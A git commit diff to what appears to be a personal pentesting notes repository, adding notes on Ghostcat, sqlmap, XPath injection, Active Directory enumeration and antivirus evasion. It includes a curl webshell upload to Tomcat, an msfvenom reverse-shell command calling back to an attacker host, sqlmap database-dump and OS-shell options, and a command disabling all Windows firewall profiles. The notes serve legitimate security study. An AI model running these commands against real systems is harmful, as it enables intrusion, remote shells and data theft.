bump

exploit/binaries/ret2libc.md

@@ -1,5 +1,7 @@
 # Ret2libc
 
+* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
+
 * Check binary via
     * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
     * `file`

exploit/java/ghostcat.md

@@ -0,0 +1,14 @@
+# Ghostcat
+
+* CVE-2020-1938
+* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
+* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
+* upload the file via
+```sh
+curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
+``` 
+* Visit the webshell at `$TARGET_IP:8080/shello/`
+* Alternatively use a war reverse shell via
+```sh
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
+```

exploit/sqli/sqli.md

@@ -135,40 +135,6 @@ GET /about/0 UNION select column_name, null,null,null,null from information_sche
     GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
     ```
 
-## Tools
-### SQLmap
-* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
-* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
-* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
-* Use `-r` with a saved HTTP request 
-```sh
-sqlmap -r request.txt --dbms=mysql --dump
-sqlmap -r request.txt --batch
-```
-* Select form data automatically
-```sh
-sqlmap -u http://<target-IP>/site.php --forms --dump-all
-```
-* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
-
-
-|Parameter|Details|
-|-r|Uses the intercepted request save as a file|
-|--dbms|DBMS of target|
-|--dump|Dump the entire database|
-|--dump-all|Dump everything|
-|-p |TESTPARAMETER|
-|--os-shell|Prompt for an interactive operating system shell|
-|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
-
-### Damn Small SQLi Scanner (DSSS)
-* [Script](https://github.com/stamparm/DSSS.git)
-```sh
-python dsss.py -u "http://example.com/index.php?id="
-```
-
-### Online sqlmap
-* [Link](https://suip.biz/?act=sqlmap)
-
 ## Payloads
 * [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
+

exploit/sqli/sqlmap.md

@@ -0,0 +1,43 @@
+# SQLmap
+
+
+* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
+* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
+
+## Usage
+
+* Use `-r` with a saved HTTP request 
+```sh
+sqlmap -r request.txt --dbms=mysql --dump
+sqlmap -r request.txt --batch
+```
+* Select form data automatically
+```sh
+sqlmap -u http://<target-IP>/site.php --forms --dump-all
+```
+* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
+
+
+|Parameter|Details|
+|-r|Uses the intercepted request save as a file|
+|--dbms|DBMS of target|
+|--dump|Dump the entire database|
+|--dump-all|Dump everything|
+|-p |TESTPARAMETER|
+|--os-shell|Prompt for an interactive operating system shell|
+|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
+|--tables|Show tables|
+|-T|Specify table|
+
+## Other Tools
+
+### Damn Small SQLi Scanner (DSSS)
+* [Script](https://github.com/stamparm/DSSS.git)
+```sh
+python dsss.py -u "http://example.com/index.php?id="
+```
+
+### Online sqlmap
+* [Link](https://suip.biz/?act=sqlmap)
+

exploit/web/bypass_rate_limiting/bypass_rate_limiting.md

@@ -1,7 +1,7 @@
 # Bypassing Rate Limit
 
 * [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
-* [Anotherinfosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
+* [Another infosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
 * [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
 
 # Usage

exploit/web/ssti/tplmap

@@ -1 +1 @@
-Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15
+Subproject commit 616b0e527f62dd0930e6346ede6bef79e9bcf717

exploit/web/xpath.md

@@ -0,0 +1,6 @@
+# XPATH injection
+
+* Similar to SQL injection, it is a input/parameter injection
+
+* [payloads all the things XPATH](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
+* Use [lanfran's payload list](https://lanfran02.github.io/posts/cold_vvars/XPATH_list.txt) as burpsuite sniper payload

exploit/windows/docs/crackmapexec.md

@@ -0,0 +1,9 @@
+# crackmapexec
+
+* In general, the syntax is as follows
+```sh
+crackmapexec smb $DOMAIN -u <user> -p <password>
+```
+* Do not set the domain at the end, it won't work.
+
+

misc/smtp.md

@@ -0,0 +1,3 @@
+# SMTP
+
+* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)

post_exploitation/docs/windows/active_directory.md

@@ -0,0 +1,30 @@
+# Active Directory Enumeration
+
+* Consists of
+    * Domain Controller 
+    * Organizational Units
+    * AD Domains
+    * AD Forest
+
+* Administrative accounts are
+    * Domain Admin
+    * Enterprise Admin
+    * Schema Admin
+    * Server Operator
+    * Account Operator
+
+## Usage
+
+* `systeminfo | findstr Domain`
+* `Get-ADUser -filter *`
+* Use found CN and DC and specify
+* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
+
+### DNS
+* Check ip via `ipconfig`
+* `nslookup`, then `server <LocalIP>` and zone transfer via 
+```sh
+ls -d <Domain>
+```
+
+

post_exploitation/docs/windows/antivirus_evasion.md

@@ -8,6 +8,32 @@
     * Static Detection -- Hash or String/Byte Matching
     * Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
 
+## Enumeration
+```sh
+wmic /namespace:\\root\securitycenter2 path antivirusproduct
+Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
+```
+```sh
+Get-Service WinDefend
+Get-MpComputerStatus | select RealTimeProtectionEnabled
+```
+* Check firewall
+```sh
+Get-NetFirewallProfile | Format-Table Name, Enabled
+```
+```sh
+Get-NetFirewallRule | select DisplayName, Enabled, Description
+```
+* Check inbound port availability
+```sh
+Test-NetConnection -ComputerName 127.0.0.1 -Port 80
+```
+
+## Reset Options
+```sh
+Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
+```
+
 ## Anti Malware Secure Interface
 * https://docs.microsoft.com/en-us/windows/win32/amsi/
 

post_exploitation/docs/windows/powershell_logs.md

@@ -8,3 +8,9 @@ reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transc
 reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
 reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
 ```
+
+## Usage
+
+```sh
+Get-EventLog -List
+```

post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester

@@ -1 +1 @@
-Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470
+Subproject commit 7c94b90223cd40c664b6e0107b5f1bf744ab5d17

post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite

@@ -1 +1 @@
-Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db
+Subproject commit 7c275d50bc324f3152650fe22b3f92bb4da23275